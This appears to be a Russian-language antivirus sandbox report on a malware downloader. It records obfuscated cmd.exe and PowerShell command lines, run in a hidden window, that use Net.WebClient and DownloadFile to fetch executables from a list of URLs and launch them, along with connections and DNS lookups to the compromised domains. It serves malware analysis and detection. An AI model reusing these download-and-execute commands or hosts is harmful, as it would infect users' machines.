Техническая информация
- '<SYSTEM32>\cmd.exe' /V:/C"set qyle=;'LZB'=DmQ$}}{hctac}};kaerb;'WNi'=jXd$;lVw$ metI-ekovnI{ )00008 eg- htgnel.)lVw$ metI-teG(( fI;'lWc'=jkE$;)lVw$ ,siw$(eliFdaolnwoD.Rwr${yrt{)OZb$ ni siw$(hcaerof;'exe.'+CDR$+'\'+...
- 'tr####hilders.com':80
- 'th###wans.com':80
- 'su####ardoso.com.br':80
- 'st###-castle.ir':80
- 'st###-castle.ir':443
- http://tr####hilders.com/G
- http://th###wans.com/3Pr2Hp
- http://st###-castle.ir/8WzsCrw
- 'st###-castle.ir':443
- DNS ASK tr####hilders.com
- DNS ASK th###wans.com
- DNS ASK st###tmeharg.ie
- DNS ASK su####ardoso.com.br
- DNS ASK st###-castle.ir
- '<SYSTEM32>\cmd.exe' /V:/C"set qyle=;'LZB'=DmQ$}}{hctac}};kaerb;'WNi'=jXd$;lVw$ metI-ekovnI{ )00008 eg- htgnel.)lVw$ metI-teG(( fI;'lWc'=jkE$;)lVw$ ,siw$(eliFdaolnwoD.Rwr${yrt{)OZb$ ni siw$(hcaerof;'exe.'+CDR$+'\'+...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /S /D /c" echo powershell $mKD='uFj';$rwR=new-object Net.WebClient;$bZO='http://tr####hilders.com/G@http://thedewans.com/3Pr2Hp@http://stuartmeharg.ie/n@http://supercardoso.com.br/aOHFp@http://...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' =uFj